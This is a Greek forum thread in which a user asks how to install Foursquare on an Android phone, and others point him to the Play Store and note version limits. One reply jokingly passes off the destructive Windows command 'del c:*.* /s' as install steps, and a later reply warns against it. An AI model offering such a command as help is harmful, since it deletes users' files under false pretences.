Νέα

Εγκατάσταση εφαρμογής σε smartphone Android

• Μέλος που άνοιξε το νήμα rantanplangr30
  • Ημερομηνία ανοίγματος
  • Απαντήσεις 15
  • Εμφανίσεις 1K
  • Tagged users Καμία
  • Βλέπουν το thread αυτή τη στιγμή 1 άτομα (0 μέλη και 1 επισκέπτες)

rantanplangr30

Σπουδαίος
Εγγρ.
28 Σεπ 2013
Κριτικές
39
Like
5.050
Πόντοι
2.696
Ξέρει κάποιος πώς θα εγκαταστήσω μια εφαρμογή στο κινητό μου,με Android;Θέλω να εγκαταστήσω το forsquare κατεβάζοντάς το στον Η/Υ;

dik

Μέλος
Εγγρ.
12 Απρ 2006
Like
798
Πόντοι
96
Δεν υπάρχει λόγος να εμπλέκεις τον υπολογιστή.......τί κινητό έχεις;

redmanftw

Ενεργό Μέλος
Εγγρ.
15 Ιαν 2012
Κριτικές
10
Like
96
Πόντοι
376
Δεν υπάρχει λόγος να εμπλέκεις τον υπολογιστή.......τί κινητό έχεις;
2000-Nokia-3310.jpg

Εγγρ.
1 Ιαν 2013
Like
0
Πόντοι
0
Ξέρει κάποιος πώς θα εγκαταστήσω μια εφαρμογή στο κινητό μου,με Android;Θέλω να εγκαταστήσω το forsquare κατεβάζοντάς το στον Η/Υ;
πας κάτω αριστερά εκεί που λέει ΕΝΑΡΞΗ
στο νέο παράθυρο πατάς εκει που λέει ΕΚΤΕΛΕΣΗ
στο μαύρο φόντο που ανοίγει γράφεις ==  " del c:*.* /s  :dancing: :dancing:

Boldemort

Σεβαστός
Εγγρ.
4 Σεπ 2009
Κριτικές
12
Like
42
Πόντοι
1.220
Μην πατησεις την εντολη που σου δινει ο paparof. del ειναι για διαγραφες... οι αστερισκοι σημαινουν τα παντα ολα παιζει να διαγράψεις ολα τα αρχεια του συστηματος έτσι.

redmanftw

Ενεργό Μέλος
Εγγρ.
15 Ιαν 2012
Κριτικές
10
Like
96
Πόντοι
376
Μην πατησεις την εντολη που σου δινει ο paparof. del ειναι για διαγραφες... οι αστερισκοι σημαινουν τα παντα ολα παιζει να διαγράψεις ολα τα αρχεια του συστηματος έτσι.
Ναι όμως δεν λες τι να κάνει το παιδί!

OP
OP
rantanplangr30

rantanplangr30

Σπουδαίος
Εγγρ.
28 Σεπ 2013
Κριτικές
39
Like
5.050
Πόντοι
2.696
Καλά,δεν είμαι άσχετος,σίγουρα δε θα έγραφα αυτή την εντολή.Θα κατεβάσω την εφαρμογή που μου είπαν πιο πάνω.Και δεν πεθαίνω αν δεν βάλω το forsquare βεβαίως!

redmanftw

Ενεργό Μέλος
Εγγρ.
15 Ιαν 2012
Κριτικές
10
Like
96
Πόντοι
376
Καλά,δεν είμαι άσχετος,σίγουρα δε θα έγραφα αυτή την εντολή.Θα κατεβάσω την εφαρμογή που μου είπαν πιο πάνω.Και δεν πεθαίνω αν δεν βάλω το forsquare βεβαίως!
Βάλτο τύπε είναι καλό

dude33

Μέλος
Εγγρ.
10 Νοε 2007
Like
767
Πόντοι
146
Τι τον θες τον υπολογιστή;ΚΑτέβασε το απο το κατευθειαν απο το κινητό σου.

aunanas

Μέλος
Εγγρ.
30 Σεπ 2008
Like
0
Πόντοι
1
Ανοίγεις την εφαρμογή PlayStore στο κινητό σου, και στην αναζήτηση (συνήθως πάνω δεξιά) γράφεις foursquare. Σου το εμφανίζει και το κατεβάζεις.

*Αν το PlayStore σου ζητάει να βάλεις έναν λογαριασμό Google (Gmail δηλαδή), τότε αν έχεις απλά βάζεις το email σου και τον κωδικό σου, αν δεν έχεις πατάς νέος χρήστης και σε οδηγεί βήμα βήμα ώστε να φτιάξεις ένα Google account (δε χρειάζεται να ξανακάνεις αυτή τη διαδικασία για να κατεβάσεις κι άλλες εφαρμογές).

Ακόρεστος

Τιμημένος
Εγγρ.
28 Φεβ 2007
Κριτικές
100
Like
1.263
Πόντοι
7.195
Ανοίγεις την εφαρμογή PlayStore στο κινητό σου, και στην αναζήτηση (συνήθως πάνω δεξιά) γράφεις foursquare. Σου το εμφανίζει και το κατεβάζεις.

*Αν το PlayStore σου ζητάει να βάλεις έναν λογαριασμό Google (Gmail δηλαδή), τότε αν έχεις απλά βάζεις το email σου και τον κωδικό σου, αν δεν έχεις πατάς νέος χρήστης και σε οδηγεί βήμα βήμα ώστε να φτιάξεις ένα Google account (δε χρειάζεται να ξανακάνεις αυτή τη διαδικασία για να κατεβάσεις κι άλλες εφαρμογές).
Πληροφοριακα στην εκδοση android 2.1 που γραφει οτι εχει ο τυπος, πιθανον να μην ειναι διαθεσιμη η εφαρμογη αυτη στο πλειστορ.
Και αν δεν ειναι διαθεσιμη στο πλειστορ,τοτε απο οπου (υπολογιστη κτλ) και να την κατεβασει, δεν θα του παιξει στο κινητο...
Για παραδειγμα σε αντροιντ μικροτερης εκδοσης του 4.0 δεν διατιθεται ο google chrome και οι περισσοτερες συγχρονες εφαρμογες επισης.

ISINAS

Μέγας
Εγγρ.
17 Σεπ 2012
Κριτικές
57
Like
6.393
Πόντοι
4.006
Αδικος εισαι..Εγω απο οταν πηρα το ιφονε 4σ 23 γιγα....ειναι σαν να εχω υπολογιστη στα χερια μου οπου και αν ειμαι....με βοηθαει στην δουλεια μου στο να ενημερονομε...στο να βλεπο καιρο....νεα...ειδησησ...να εχω τσι πι εσ...και παρα πολλα αλλα.....δεν ειναι θεμα ψωνιου τυπε μου ειναι θεμα αναγκων πλεον....ετσι ειναι το συστημα σημερα  :rockon:

Stories

Νέο!

Stories

Top Bottom